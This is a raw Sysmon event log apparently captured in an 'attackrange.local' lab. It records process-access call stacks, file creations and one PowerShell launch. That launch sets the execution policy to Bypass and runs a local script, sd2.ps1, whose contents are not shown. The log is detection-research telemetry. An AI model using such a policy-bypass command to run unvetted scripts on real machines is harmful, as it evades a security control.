08:10:26.570{466BC892-02B0-60E8-1600-00000000CF01}13044400C:\Windows\System32\svchost.exe{466BC892-F8F2-60EB-107E-00000000CF01}10188C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055550Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:26.570{466BC892-02B0-60E8-1600-00000000CF01}13041340C:\Windows\System32\svchost.exe{466BC892-F8F2-60EB-107E-00000000CF01}10188C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055549Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:26.519{466BC892-32D3-60E8-770B-00000000CF01}6356700C:\Windows\Explorer.EXE{466BC892-F8F2-60EB-107E-00000000CF01}10188C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+62945|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055548Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:26.501{466BC892-32D3-60E8-770B-00000000CF01}6356700C:\Windows\Explorer.EXE{466BC892-F8F2-60EB-107E-00000000CF01}10188C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055547Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:26.501{466BC892-32D3-60E8-770B-00000000CF01}6356700C:\Windows\Explorer.EXE{466BC892-F8F2-60EB-107E-00000000CF01}10188C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055546Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:26.470{466BC892-32D3-60E8-730B-00000000CF01}59843788C:\Windows\System32\taskhostw.exe{466BC892-F8F2-60EB-117E-00000000CF01}3312C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055545Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:26.455{466BC892-32D3-60E8-730B-00000000CF01}59843788C:\Windows\System32\taskhostw.exe{466BC892-F8F2-60EB-117E-00000000CF01}3312C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055544Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:26.423{466BC892-32D3-60E8-770B-00000000CF01}63566492C:\Windows\Explorer.EXE{466BC892-F8F2-60EB-107E-00000000CF01}10188C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+62945|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055543Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:26.423{466BC892-32D3-60E8-770B-00000000CF01}63566492C:\Windows\Explorer.EXE{466BC892-F8F2-60EB-107E-00000000CF01}10188C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055542Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:26.423{466BC892-32D3-60E8-770B-00000000CF01}63566492C:\Windows\Explorer.EXE{466BC892-F8F2-60EB-107E-00000000CF01}10188C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055541Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:26.423{466BC892-32D3-60E8-770B-00000000CF01}63566492C:\Windows\Explorer.EXE{466BC892-F8F2-60EB-107E-00000000CF01}10188C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055540Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:26.420{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-F8F2-60EB-117E-00000000CF01}3312C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+622c0|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055539Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:26.420{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-F8F2-60EB-117E-00000000CF01}3312C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47c90|C:\Windows\System32\SHELL32.dll+6227c|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055538Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:26.419{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-F8F2-60EB-117E-00000000CF01}3312C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62250|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055537Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:26.419{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-F8F2-60EB-117E-00000000CF01}3312C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d2c9|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x80000000000000001055536Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:26.386{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXEC:\Users\bob\AppData\Roaming\Microsoft\Windows\Recent\test.lnk2021-07-12 07:44:24.124 23542300x80000000000000001055535Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:26.386{466BC892-32D3-60E8-770B-00000000CF01}6356ATTACKRANGE\bobC:\Windows\Explorer.EXEC:\Users\bob\AppData\Roaming\Microsoft\Windows\Recent\test.lnkMD5=1BAD03CA3931966D8844C2E4D7C2B462,SHA256=2877D60F7760632BB56A991256120A7A99021E6F2BC7844553E8DAC6ABE30C3B,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001055534Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:26.354{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXEC:\Users\bob\AppData\Roaming\Microsoft\Windows\Recent\sd2.ps1.lnk2021-07-12 07:48:31.902 10341000x80000000000000001055533Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:26.354{466BC892-02B0-60E8-1600-00000000CF01}13044400C:\Windows\System32\svchost.exe{466BC892-F8F2-60EB-117E-00000000CF01}3312C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055532Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:26.354{466BC892-02B0-60E8-1600-00000000CF01}13041340C:\Windows\System32\svchost.exe{466BC892-F8F2-60EB-117E-00000000CF01}3312C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001055531Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:26.354{466BC892-32D3-60E8-770B-00000000CF01}6356ATTACKRANGE\bobC:\Windows\Explorer.EXEC:\Users\bob\AppData\Roaming\Microsoft\Windows\Recent\sd2.ps1.lnkMD5=F162F5A3A8EA069EFE08946426F0949D,SHA256=3548E24A809395CF1715D89F4CC3F6DE8CCF1F0DE7425435E6710264AC524053,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001055530Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:26.339{466BC892-F8F2-60EB-117E-00000000CF01}33128908C:\Windows\system32\conhost.exe{466BC892-F8F2-60EB-107E-00000000CF01}10188C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055529Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:26.323{466BC892-32CD-60E8-670B-00000000CF01}45166612C:\Windows\system32\csrss.exe{466BC892-F8F2-60EB-117E-00000000CF01}3312C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001055528Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:26.322{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055527Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:26.322{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055526Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:26.322{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055525Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:26.322{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055524Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:26.321{466BC892-32CD-60E8-670B-00000000CF01}45163808C:\Windows\system32\csrss.exe{466BC892-F8F2-60EB-107E-00000000CF01}10188C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001055523Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:26.321{466BC892-32D3-60E8-770B-00000000CF01}63567592C:\Windows\Explorer.EXE{466BC892-F8F2-60EB-107E-00000000CF01}10188C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+9070f|C:\Windows\System32\windows.storage.dll+90385|C:\Windows\System32\windows.storage.dll+8fe76|C:\Windows\System32\windows.storage.dll+912e8|C:\Windows\System32\windows.storage.dll+8fc9e|C:\Windows\System32\windows.storage.dll+92ab5|C:\Windows\System32\windows.storage.dll+92e34|C:\Windows\System32\windows.storage.dll+92470|C:\Windows\System32\windows.storage.dll+94c4a|C:\Windows\System32\windows.storage.dll+94a02|C:\Windows\System32\SHELL32.dll+3f98d|C:\Windows\System32\SHELL32.dll+3e526|C:\Windows\System32\SHELL32.dll+802b1|C:\Windows\System32\SHELL32.dll+6724e|C:\Windows\System32\SHELL32.dll+16d60c|C:\Windows\System32\SHELL32.dll+19e7e8|C:\Windows\System32\SHELL32.dll+2844a3|C:\Windows\system32\explorerframe.dll+13cf7b|C:\Windows\system32\explorerframe.dll+139d07|C:\Windows\System32\SHELL32.dll+16d8b0 154100x80000000000000001055522Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:26.298{466BC892-F8F2-60EB-107E-00000000CF01}10188C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "-Command" "if((Get-ExecutionPolicy ) -ne 'AllSigned') { Set-ExecutionPolicy -Scope Process Bypass }; & 'C:\Temp\test\sd2.ps1'"C:\Temp\test\ATTACKRANGE\bob{466BC892-32CE-60E8-37BC-780000000000}0x78bc373MediumMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\explorer.exeC:\Windows\Explorer.EXE 23542300x80000000000000001055521Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:26.119{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=52CA32AECA2F5EDBD4DEF1FA1D574098,SHA256=D04AF8ED81CF7BEC025455B9D384CE69DA7CAE721DA652DEB471D9FC7874F715,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000810859Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:24.272{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57497-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x8000000000000000810858Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:26.342{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F8F2-60EB-F479-00000000D001}896C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810857Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:26.342{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810856Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:26.342{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810855Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 